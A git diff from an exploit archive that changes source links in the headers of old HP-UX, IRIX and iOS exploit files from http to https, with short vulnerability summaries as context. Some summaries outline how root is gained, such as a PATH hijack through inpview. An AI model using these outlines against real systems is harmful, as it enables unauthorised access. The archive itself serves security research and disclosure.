@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/352/info +source: https://www.securityfocus.com/bid/352/info Certain versions of AIX and HP/UX contained a bug in the way the OS handled the connect system call. The connect call is used to initiate a connection on a socket. Because of the flaw in the handling code under AIX certain versions will reboot when given two connects, one to a fixed port (a number of different ports were found to trigger this behaviour) and then another random port connection immediately thereafter. diff --git a/exploits/hp-ux/dos/20373.txt b/exploits/hp-ux/dos/20373.txt index 6ce5fc6f5..c71f7b54a 100644 --- a/exploits/hp-ux/dos/20373.txt +++ b/exploits/hp-ux/dos/20373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1886/info +source: https://www.securityfocus.com/bid/1886/info cu is a unix utility that is used for communication between two hosts (usually over phone lines). It is typically isntalled setuid root so that it can access communications hardware when executed by a regular user. diff --git a/exploits/hp-ux/dos/22552.txt b/exploits/hp-ux/dos/22552.txt index 88f192dab..5a60108a0 100644 --- a/exploits/hp-ux/dos/22552.txt +++ b/exploits/hp-ux/dos/22552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7459/info +source: https://www.securityfocus.com/bid/7459/info It has been reported that a problem in the rexec program included with some versions of HP-UX may be vulnerable to a boundary condition error. It may be possible for a local user to exploit this vulnerability to gain elevated privileges on the system. diff --git a/exploits/hp-ux/dos/22561.txt b/exploits/hp-ux/dos/22561.txt index 23bd58a2a..79bb5f396 100644 --- a/exploits/hp-ux/dos/22561.txt +++ b/exploits/hp-ux/dos/22561.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7489/info +source: https://www.securityfocus.com/bid/7489/info HP-UX rwrite utility has been reported prone to a buffer overflow vulnerability. Although unconfirmed code execution with elevated privileges may be possible. diff --git a/exploits/hp-ux/dos/23236.txt b/exploits/hp-ux/dos/23236.txt index 8bf4e2313..30dad5a02 100644 --- a/exploits/hp-ux/dos/23236.txt +++ b/exploits/hp-ux/dos/23236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8795/info +source: https://www.securityfocus.com/bid/8795/info It has been reported that dtprintinfo, installed setuid root by default, is susceptible to a locally exploitable buffer overflow vulnerability. The condition is triggered when the value of the DISPLAY environment variable is set to a string exceeding 9777 bytes in length. The vulnerability may allow for local attackers to gain root privileges on the affected host. diff --git a/exploits/hp-ux/local/19535.pl b/exploits/hp-ux/local/19535.pl index 8df23a648..6c356a793 100755 --- a/exploits/hp-ux/local/19535.pl +++ b/exploits/hp-ux/local/19535.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/683/info +#source: https://www.securityfocus.com/bid/683/info # #Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. diff --git a/exploits/hp-ux/local/19990.txt b/exploits/hp-ux/local/19990.txt index 14d3c8500..c8dbed6ba 100644 --- a/exploits/hp-ux/local/19990.txt +++ b/exploits/hp-ux/local/19990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1302/info +source: https://www.securityfocus.com/bid/1302/info The programmers of the 'man' command on various HPUX releases have made several fatal mistakes that allow an attacker to trivially set a trap that could result in any arbitrary file being overwritten on the system when root runs the 'man' command. 
diff --git a/exploits/hp-ux/local/20002.txt b/exploits/hp-ux/local/20002.txt index e3a1dc681..52442cc7e 100644 --- a/exploits/hp-ux/local/20002.txt +++ b/exploits/hp-ux/local/20002.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1327/info +source: https://www.securityfocus.com/bid/1327/info A vulnerability exists in the snmpd included with HPUX 11, from Hewlett Packard. The configuration file for the snmpd is world writable. This could allow any user on the system to view and/or alter the settings of the snmp daemon. This in turn could be used to alter the configuration of the system, including, but not limited to, routing, addressing, arp caches, the status of connections, and so on. It is also possible this could be used to elevate access levels. diff --git a/exploits/hp-ux/local/20162.txt b/exploits/hp-ux/local/20162.txt index 8f02d0e43..18dacbb4a 100644 --- a/exploits/hp-ux/local/20162.txt +++ b/exploits/hp-ux/local/20162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1602/info +source: https://www.securityfocus.com/bid/1602/info A vulnerability exists in HP-UX, from Hewlett Packard, under certain configurations. Version 11.0 is confirmed to have this problem; other versions may also be susceptible. If the CLEAR_TMP option in /etc/rc.config.d is set to 1, meaning enabled, it is possible for a local user to create a symbolic link in /tmp that will be followed prior to being removed. This will allow the local user to overwrite any file upon reboot. diff --git a/exploits/hp-ux/local/20329.sh b/exploits/hp-ux/local/20329.sh index e04b41675..a12c5ea36 100755 --- a/exploits/hp-ux/local/20329.sh +++ b/exploits/hp-ux/local/20329.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1845/info +source: https://www.securityfocus.com/bid/1845/info crontab is a binary in the cron package of the HP-UX cron implementation which allows a user to create a file of scheduled commands. A vulnerabiltiy in crontab exists that allows a user to read any file on an HP-UX system. crontab as implemented with HP-UX is a access controlled binary. Users are permitted to run crontab only if they have an access entry in the crontab.allow file. diff --git a/exploits/hp-ux/local/20386.txt b/exploits/hp-ux/local/20386.txt index ffb8d1361..e13b53832 100644 --- a/exploits/hp-ux/local/20386.txt +++ b/exploits/hp-ux/local/20386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1919/info +source: https://www.securityfocus.com/bid/1919/info The registrar service that ships with version 10.20 (possibly others) of HP's HP-UX operating system contains a vulnerability that may allow a local user to read any file on the hosts filesystem. The service (which listens on tcp port 1712) writes to a log file, /etc/opt/resmon/log/registrar.log. diff --git a/exploits/hp-ux/local/20396.sh b/exploits/hp-ux/local/20396.sh index 9f2318c60..568a245a1 100755 --- a/exploits/hp-ux/local/20396.sh +++ b/exploits/hp-ux/local/20396.sh @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/1929/info +# source: https://www.securityfocus.com/bid/1929/info # # Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default. # diff --git a/exploits/hp-ux/local/20724.txt b/exploits/hp-ux/local/20724.txt index db662ce8a..45507b612 100644 --- a/exploits/hp-ux/local/20724.txt +++ b/exploits/hp-ux/local/20724.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2535/info +source: https://www.securityfocus.com/bid/2535/info Shareplex is a database replication tool from Quest Software. diff --git a/exploits/hp-ux/local/21098.c b/exploits/hp-ux/local/21098.c index d7c26f129..5699b59bf 100644 --- a/exploits/hp-ux/local/21098.c +++ b/exploits/hp-ux/local/21098.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3279/info +// source: https://www.securityfocus.com/bid/3279/info HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems. diff --git a/exploits/hp-ux/local/21577.c b/exploits/hp-ux/local/21577.c index e99ffaada..60e0d14a7 100644 --- a/exploits/hp-ux/local/21577.c +++ b/exploits/hp-ux/local/21577.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5088/info +// source: https://www.securityfocus.com/bid/5088/info A vulnerability has been reported in the /opt/cifsclient/bin/cifslogin utility distributed with CIFS/9000. The utility is prone to several buffer overflow conditions and may lead to root compromise. diff --git a/exploits/hp-ux/local/22231.txt b/exploits/hp-ux/local/22231.txt index 3bb30171d..e6457a2b4 100644 --- a/exploits/hp-ux/local/22231.txt +++ b/exploits/hp-ux/local/22231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6800/info +source: https://www.securityfocus.com/bid/6800/info It has been reported that the HPUX wall executable may be prone to a buffer overflow condition. This buffer overflow is alleged to be triggered when an excessive amount of data is redirected into wall as a message intended to be broadcast. diff --git a/exploits/hp-ux/local/22246.c b/exploits/hp-ux/local/22246.c index eda89132b..b009ea35d 100644 --- a/exploits/hp-ux/local/22246.c +++ b/exploits/hp-ux/local/22246.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6836/info +// source: https://www.securityfocus.com/bid/6836/info A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-suplied data to the alternate typeface library command-line option. diff --git a/exploits/hp-ux/local/22247.sh b/exploits/hp-ux/local/22247.sh index 5853038ce..6eeae58a2 100755 --- a/exploits/hp-ux/local/22247.sh +++ b/exploits/hp-ux/local/22247.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6836/info +source: https://www.securityfocus.com/bid/6836/info A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-suplied data to the alternate typeface library command-line option. diff --git a/exploits/hp-ux/local/22248.sh b/exploits/hp-ux/local/22248.sh index f975d3325..1b2856a33 100755 --- a/exploits/hp-ux/local/22248.sh +++ b/exploits/hp-ux/local/22248.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6837/info +source: https://www.securityfocus.com/bid/6837/info The rs.F3000 binary is prone to an issue that may allow attackers to obtain unauthorized access to a vulnerable system. A denial of service attack is also possible. This is due to multiple instances of the system() function being used in an unsafe manner. diff --git a/exploits/hp-ux/local/23341.c b/exploits/hp-ux/local/23341.c index 0b9e09c7b..085908fc0 100644 --- a/exploits/hp-ux/local/23341.c +++ b/exploits/hp-ux/local/23341.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8985/info +// source: https://www.securityfocus.com/bid/8985/info HP-UX allows the NLSPATH to be set for setuid root programs, which use catopen(3C) and may be executed by other local users. This could result in privilege escalation as an attacker could specify an arbitrary path for a message catalogue, which will be opened with elevated privileges. diff --git a/exploits/hp-ux/local/23342.c b/exploits/hp-ux/local/23342.c index aba036047..9ad84abac 100644 --- a/exploits/hp-ux/local/23342.c +++ b/exploits/hp-ux/local/23342.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8985/info +// source: https://www.securityfocus.com/bid/8985/info HP-UX allows the NLSPATH to be set for setuid root programs, which use catopen(3C) and may be executed by other local users. This could result in privilege escalation as an attacker could specify an arbitrary path for a message catalogue, which will be opened with elevated privileges. diff --git a/exploits/hp-ux/local/23343.c b/exploits/hp-ux/local/23343.c index 7018e064f..c8c28b1af 100644 --- a/exploits/hp-ux/local/23343.c +++ b/exploits/hp-ux/local/23343.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8986/info +// source: https://www.securityfocus.com/bid/8986/info HP has reported that some Software Distributor (SD) utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall(1M) and swverify(1M). diff --git a/exploits/hp-ux/local/24210.pl b/exploits/hp-ux/local/24210.pl index 77b797890..f885e5512 100755 --- a/exploits/hp-ux/local/24210.pl +++ b/exploits/hp-ux/local/24210.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10551/info +source: https://www.securityfocus.com/bid/10551/info HP-UX X Font Server is reportedly affected by a local buffer overflow vulnerability. This issue is due to a failure of the application to properly validate the length of a user-supplied string before copying it into a finite buffer. diff --git a/exploits/hp-ux/local/28984.pl b/exploits/hp-ux/local/28984.pl index 022389dd0..6dd6f168a 100755 --- a/exploits/hp-ux/local/28984.pl +++ b/exploits/hp-ux/local/28984.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21035/info +source: https://www.securityfocus.com/bid/21035/info HP Tru64 is prone to a local privilege-escalation vulnerability. @@ -26,7 +26,7 @@ Successful exploits will result in a complete compromise of vulnerable computers # # References: # http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7235 - # http://www.securityfocus.com/bid/21085 + # https://www.securityfocus.com/bid/21085 # # Tested on Windows XP SP1 with # Universal FTP Server 1.0.44 diff --git a/exploits/hp-ux/remote/22733.c b/exploits/hp-ux/remote/22733.c index 2a0d194f2..965c6d20a 100644 --- a/exploits/hp-ux/remote/22733.c +++ b/exploits/hp-ux/remote/22733.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7825/info +// source: https://www.securityfocus.com/bid/7825/info A vulnerability has been discovered in the HP-UX 11 ftpd daemon. The problem can be triggered using the FTP REST command. By specifying a specially calculated numeric argument to the command, it is possible to disclose the contents of that numeric location in process memory. This issue may be exploited to disclose the contents of sensitive files, such as /etc/passwd. diff --git a/exploits/immunix/local/19875.txt b/exploits/immunix/local/19875.txt index 5c7474a9c..88271108d 100644 --- a/exploits/immunix/local/19875.txt +++ b/exploits/immunix/local/19875.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1139/info +source: https://www.securityfocus.com/bid/1139/info PostgreSQL is a free RDBMS that is released under a Berkeley style license. PostgreSQL stores passwords for database users in a binary file called pg_shadow. This file is readable by root and the postgres user. Unfortunately, these passwords are stored in cleartext form and can be obtained if a user with read access to the file runs strings on it. While this is only readable by root and the postgres user (by default), it allows either one (or whoever else has read access to the file) to get the passwords for all databases and bypass authentication completely. diff --git a/exploits/immunix/local/20187.c b/exploits/immunix/local/20187.c index 325a2a0c4..5bec215a1 100644 --- a/exploits/immunix/local/20187.c +++ b/exploits/immunix/local/20187.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1634/info +source: https://www.securityfocus.com/bid/1634/info nectiva 4.x/5.x,Debian 2.x,IBM AIX 3.x/4.x,Mandrake 7,RedHat 5.x/6.x,IRIX 6.x, Solaris 2.x/7/8,Turbolinux 6.x,Wirex Immunix OS 6.2 Locale Subsystem Format String diff --git a/exploits/ios/dos/31057.html b/exploits/ios/dos/31057.html index 20e0b1851..57f6a7c72 100644 --- a/exploits/ios/dos/31057.html +++ b/exploits/ios/dos/31057.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27442/info +source: https://www.securityfocus.com/bid/27442/info Apple iPhone is prone to a remote denial-of-service vulnerability. diff --git a/exploits/ios/dos/38032.pl b/exploits/ios/dos/38032.pl index 3aaf78b73..d643d438f 100755 --- a/exploits/ios/dos/38032.pl +++ b/exploits/ios/dos/38032.pl @@ -16,7 +16,7 @@ # FaceBook : https://www.facebook.com/mohammadreza.espargham -#Source : http://www.securityfocus.com/bid/75217/info +#Source : https://www.securityfocus.com/bid/75217/info # 1.run perl code 
diff --git a/exploits/ios/local/35010.txt b/exploits/ios/local/35010.txt index 9185390de..a3d959a53 100644 --- a/exploits/ios/local/35010.txt +++ b/exploits/ios/local/35010.txt @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/45010/info +// source: https://www.securityfocus.com/bid/45010/info // // Apple iOS is prone to a local privilege-escalation vulnerability. // diff --git a/exploits/ios/remote/38058.py b/exploits/ios/remote/38058.py index a175a216f..26abc3c81 100755 --- a/exploits/ios/remote/38058.py +++ b/exploits/ios/remote/38058.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56665/info +source: https://www.securityfocus.com/bid/56665/info Twitter for iPhone is prone to a security vulnerability that lets attackers to perform a man-in-the-middle attack. diff --git a/exploits/ios/remote/38634.txt b/exploits/ios/remote/38634.txt index 5463e107b..3e89a6ae5 100644 --- a/exploits/ios/remote/38634.txt +++ b/exploits/ios/remote/38634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61081/info +source: https://www.securityfocus.com/bid/61081/info Air Drive Plus is prone to multiple input validation vulnerabilities including a local file-include vulnerability, an arbitrary file-upload vulnerability, and an HTML-injection vulnerability. diff --git a/exploits/ios/remote/39114.txt b/exploits/ios/remote/39114.txt index 1cea26274..8af21eeca 100644 --- a/exploits/ios/remote/39114.txt +++ b/exploits/ios/remote/39114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66108/info +source: https://www.securityfocus.com/bid/66108/info Apple iOS is affected by a security-bypass vulnerability. diff --git a/exploits/irix/dos/19357.sh b/exploits/irix/dos/19357.sh index ae5c8bc68..aaf27c216 100755 --- a/exploits/irix/dos/19357.sh +++ b/exploits/irix/dos/19357.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/471/info +source: https://www.securityfocus.com/bid/471/info The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics contains a security hole which could result in the compromise of the root account. By blindly taking the contents of the $HOSTNAME variable, and not placing quotes around it, the spaceball.sh program can be made to execute commands. diff --git a/exploits/irix/dos/21431.txt b/exploits/irix/dos/21431.txt index 55c5abe76..c1874999f 100644 --- a/exploits/irix/dos/21431.txt +++ b/exploits/irix/dos/21431.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4642/info +source: https://www.securityfocus.com/bid/4642/info Performance Co-Pilot (PCP) is a set of services to support system-level performance monitoring developed by SGI. It has traditionally been an IRIX product, however SGI has made it open source and it is now available for Linux systems. diff --git a/exploits/irix/dos/22638.txt b/exploits/irix/dos/22638.txt index 7179b0389..8168f20b0 100644 --- a/exploits/irix/dos/22638.txt +++ b/exploits/irix/dos/22638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7672/info +source: https://www.securityfocus.com/bid/7672/info A buffer overflow vulnerability has been reported for the MediaMail binary that may result in a user obtaining elevated privileges. diff --git a/exploits/irix/dos/23167.c b/exploits/irix/dos/23167.c index 77ff6bf92..6ccf1263d 100644 --- a/exploits/irix/dos/23167.c +++ b/exploits/irix/dos/23167.c @@ -1,3 +1,4 @@ +/* against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2) (c) 1999 by diff --git a/exploits/irix/local/19066.txt b/exploits/irix/local/19066.txt index f48014f47..3b4f1ac2b 100644 --- a/exploits/irix/local/19066.txt +++ b/exploits/irix/local/19066.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/72/info +source: https://www.securityfocus.com/bid/72/info Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to overwrite root-owned files allowing root access. diff --git a/exploits/irix/local/19067.txt b/exploits/irix/local/19067.txt index 1f61874f2..e201aa9bb 100644 --- a/exploits/irix/local/19067.txt +++ b/exploits/irix/local/19067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/73/info +source: https://www.securityfocus.com/bid/73/info Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access. diff --git a/exploits/irix/local/19163.sh b/exploits/irix/local/19163.sh index 3bd6a7532..d6e847e1c 100755 --- a/exploits/irix/local/19163.sh +++ b/exploits/irix/local/19163.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/213/info +source: https://www.securityfocus.com/bid/213/info A vulnerability exists in the ioconfig program, as shipping with IRIX 6.4 S2MP from Silicon Graphics, Inc. This program is only available on Irix 6.4 for the Origin/Onyx2. Other machines running IRIX are not vulnerable. diff --git a/exploits/irix/local/19210.txt b/exploits/irix/local/19210.txt index 5f53dac9a..8e8788620 100644 --- a/exploits/irix/local/19210.txt +++ b/exploits/irix/local/19210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/262/info +source: https://www.securityfocus.com/bid/262/info The setuid root "midikeys" executable can be used to edit arbitrary files via its graphical user interface. This grants malicious users root access to the system. 
diff --git a/exploits/irix/local/19260.sh b/exploits/irix/local/19260.sh index 43221ed62..04d57abe7 100755 --- a/exploits/irix/local/19260.sh +++ b/exploits/irix/local/19260.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/330/info +source: https://www.securityfocus.com/bid/330/info SGI's IRIX 5.x and 6.x operating system include a utility called /usr/lib/netaddpr. This program can be used by privledged users to add network printing devices to the system. A race condition exists in this program that could allow any "privledged" user to obtain root access. diff --git a/exploits/irix/local/19262.txt b/exploits/irix/local/19262.txt index c38bb39e3..e8bc5bb2b 100644 --- a/exploits/irix/local/19262.txt +++ b/exploits/irix/local/19262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/333/info +source: https://www.securityfocus.com/bid/333/info A vulnerability exists in the /usr/bin/X11/cdplayer application as shipped with SGI's IRIX operating system. By failing to shed root privileges, and creating arbitrary directories as root, cdplayer allows arbitrary users to gain root on the system. diff --git a/exploits/irix/local/19267.c b/exploits/irix/local/19267.c index 7abf9e1ee..6a0d38d87 100644 --- a/exploits/irix/local/19267.c +++ b/exploits/irix/local/19267.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/334/info +// source: https://www.securityfocus.com/bid/334/info A vulnerability exists in the X libraries as supplied with Silicon Graphics IRIX operating system. By placing a carefully constructed buffer as the argument to the -xrm option, an attacker can execute arbitrary code. diff --git a/exploits/irix/local/19268.txt b/exploits/irix/local/19268.txt index 94cdaf9ee..28fa3df34 100644 --- a/exploits/irix/local/19268.txt +++ b/exploits/irix/local/19268.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/335/info +source: https://www.securityfocus.com/bid/335/info A vulnerability exists in the chost and cimport programs, as shipped with SGI's Irix 5.x operating system. chost is part of the Cadmin package. By failing to validate the real userid, these programs allow any user to edit protected files, such as the passwd file. diff --git a/exploits/irix/local/19269.txt b/exploits/irix/local/19269.txt index 6cb19f2d2..9173f9809 100644 --- a/exploits/irix/local/19269.txt +++ b/exploits/irix/local/19269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/336/info +source: https://www.securityfocus.com/bid/336/info Colorview fails to validate that the user has access to the file supplied to the -text option. As a result, users can view arbitrary files. diff --git a/exploits/irix/local/19273.sh b/exploits/irix/local/19273.sh index 06c6cc98c..6afd9540a 100755 --- a/exploits/irix/local/19273.sh +++ b/exploits/irix/local/19273.sh @@ -1,5 +1,5 @@ #!/bin/sh -#source: http://www.securityfocus.com/bid/345/info +#source: https://www.securityfocus.com/bid/345/info # #A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. # diff --git a/exploits/irix/local/19274.c b/exploits/irix/local/19274.c index 999b9e5d0..44c8ebae6 100644 --- a/exploits/irix/local/19274.c +++ b/exploits/irix/local/19274.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/346/info +// source: https://www.securityfocus.com/bid/346/info A buffer overflow exists in IRIX 5.x and 6.x 'df' utility, from Silicon Graphics Inc. By supplying a long argument to the -f option of df, a user can crash the df program. By carefully crafting a buffer containing machine executable code, an attacker can run arbitrary commands as root. diff --git a/exploits/irix/local/19275.txt b/exploits/irix/local/19275.txt index 4904da5e2..2445d85ce 100644 
--- a/exploits/irix/local/19275.txt +++ b/exploits/irix/local/19275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/347/info +source: https://www.securityfocus.com/bid/347/info A vulnerability exists in the datman/cdman program, as included with Irix 6.2 and 5.3 from Silicon Graphics Inc. The vulnerability would allow arbitrary users to execute commands as root. diff --git a/exploits/irix/local/19276.c b/exploits/irix/local/19276.c index a33b1600e..a9f7ad197 100644 --- a/exploits/irix/local/19276.c +++ b/exploits/irix/local/19276.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/351/info +// source: https://www.securityfocus.com/bid/351/info A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the stack, and execute arbitrary code as root. Eject is normally used to eject removeable media from the system, and as such is setuid root to allow for any user at the console to perform eject operations. diff --git a/exploits/irix/local/19277.c b/exploits/irix/local/19277.c index dac1b241c..f14e9f797 100644 --- a/exploits/irix/local/19277.c +++ b/exploits/irix/local/19277.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/351/info +// source: https://www.securityfocus.com/bid/351/info A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the stack, and execute arbitrary code as root. Eject is normally used to eject removeable media from the system, and as such is setuid root to allow for any user at the console to perform eject operations. diff --git a/exploits/irix/local/19280.txt b/exploits/irix/local/19280.txt index 115c43e8c..eb635b2ab 100644 --- a/exploits/irix/local/19280.txt +++ b/exploits/irix/local/19280.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/355/info +source: https://www.securityfocus.com/bid/355/info A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privlilege. diff --git a/exploits/irix/local/19304.txt b/exploits/irix/local/19304.txt index de30add02..707dc3de7 100644 --- a/exploits/irix/local/19304.txt +++ b/exploits/irix/local/19304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/381/info +source: https://www.securityfocus.com/bid/381/info The inpview utility, included by SGI in its Irix operating system, contains a vulnerability that will allow any local user to obtain root access. inpview is part of the InPerson dektop video conferencing package. As it needs to access a video capture device, it is setuid root, and attempts to run the "ttsession" utility using the system() library call. It does not specificy an explicit path, and as such will execute the first program or script named "ttsession" in the users path. By setting /tmp to be first in your path, creating a shell script in /tmp call ttsession, and making it executable, this shell script will be executed as root. diff --git a/exploits/irix/local/19310.c b/exploits/irix/local/19310.c index a0e4419ef..0a381e2ce 100644 --- a/exploits/irix/local/19310.c +++ b/exploits/irix/local/19310.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/392/info +source: https://www.securityfocus.com/bid/392/info A buffer overflow exists in the /bin/login program supplied by Silicon Graphics, as part of their Irix operating system. By supplying a carefully crafted, log buffer to the -h option of login, a local user can obtain root privileges. */ diff --git a/exploits/irix/local/19313.txt b/exploits/irix/local/19313.txt index 4e79d5836..9b93bd89a 100644 --- a/exploits/irix/local/19313.txt +++ b/exploits/irix/local/19313.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/395/info +source: https://www.securityfocus.com/bid/395/info A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp. diff --git a/exploits/irix/local/19317.c b/exploits/irix/local/19317.c index 0f034d424..ccd0691bb 100644 --- a/exploits/irix/local/19317.c +++ b/exploits/irix/local/19317.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/415/info +// source: https://www.securityfocus.com/bid/415/info A buffer overflow exists in the ordist program, as shipped with Irix 6.x and 5.x from Silicon Graphics. By supplying long arguments to the '-d' option, containing a properly crafted buffer of machine exectuable code, root privilege can be obtained. diff --git a/exploits/irix/local/19319.txt b/exploits/irix/local/19319.txt index 00fcd0005..0a53ead9e 100644 --- a/exploits/irix/local/19319.txt +++ b/exploits/irix/local/19319.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/419/info +source: https://www.securityfocus.com/bid/419/info A vulnerability exists in the pkgadjust utility shipped with Irix 5.3 from Silicon Graphics. This vulnerability can result in the compromise of the root account. diff --git a/exploits/irix/local/19347.c b/exploits/irix/local/19347.c index c60e0d1e3..951dca994 100644 --- a/exploits/irix/local/19347.c +++ b/exploits/irix/local/19347.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/457/info +// source: https://www.securityfocus.com/bid/457/info The pset utility, as shipped by SGI with Irix 5.x and 6.x through 6.3, contains a buffer overflow, which can allow any user on the system to execute arbitrary code on the machine as root. Pset is used to configure and administer processor groups in multiprocessor systems. By supplying a well crafted, long buffer as an argument, the return address on the stack is overwritten, allowing an attacker to execute code other than that which was intended. diff --git a/exploits/irix/local/19349.txt b/exploits/irix/local/19349.txt index ded208909..1df949943 100644 --- a/exploits/irix/local/19349.txt +++ b/exploits/irix/local/19349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/460/info +source: https://www.securityfocus.com/bid/460/info A vulnerability exists in the rmail utility, included by SGI with it's Irix operating system. By failing to sanity check the contents of an environment variable, arbitrary commands may be executed with gid mail. rmail is used with uucp. diff --git a/exploits/irix/local/19351.sh b/exploits/irix/local/19351.sh index 5a3ab3e82..284b4ea3e 100755 --- a/exploits/irix/local/19351.sh +++ b/exploits/irix/local/19351.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/464/info +source: https://www.securityfocus.com/bid/464/info A race condition exists in the serial_ports administrative program, as included by SGI in the 5.x Irix operating system. This race condition allows regular users to execute arbitrary commands as root. diff --git a/exploits/irix/local/19353.txt b/exploits/irix/local/19353.txt index baaec1c38..f872505e2 100644 --- a/exploits/irix/local/19353.txt +++ b/exploits/irix/local/19353.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/467/info +source: https://www.securityfocus.com/bid/467/info A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with it's Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root. diff --git a/exploits/irix/local/19355.txt b/exploits/irix/local/19355.txt index 67710b6ab..b5b039dce 100644 --- a/exploits/irix/local/19355.txt +++ b/exploits/irix/local/19355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/469/info +source: https://www.securityfocus.com/bid/469/info A vulnerability exists in the startmidi program from Silicon Graphics. This utility is included with Irix versions 5.x and 6.x with the Iris Digital Media Execution Environment. startmidi is setuid root, and creates a temporary file called /tmp/.midipid. It does not check to see if this file already exists, and is a symbolic link. As such, it can be used to create root owned files, with permissions as set by the user umask. diff --git a/exploits/irix/local/19356.txt b/exploits/irix/local/19356.txt index bc20b9346..2d6cf7e58 100644 --- a/exploits/irix/local/19356.txt +++ b/exploits/irix/local/19356.txt @@ -1,4 +1,4 @@ -source: 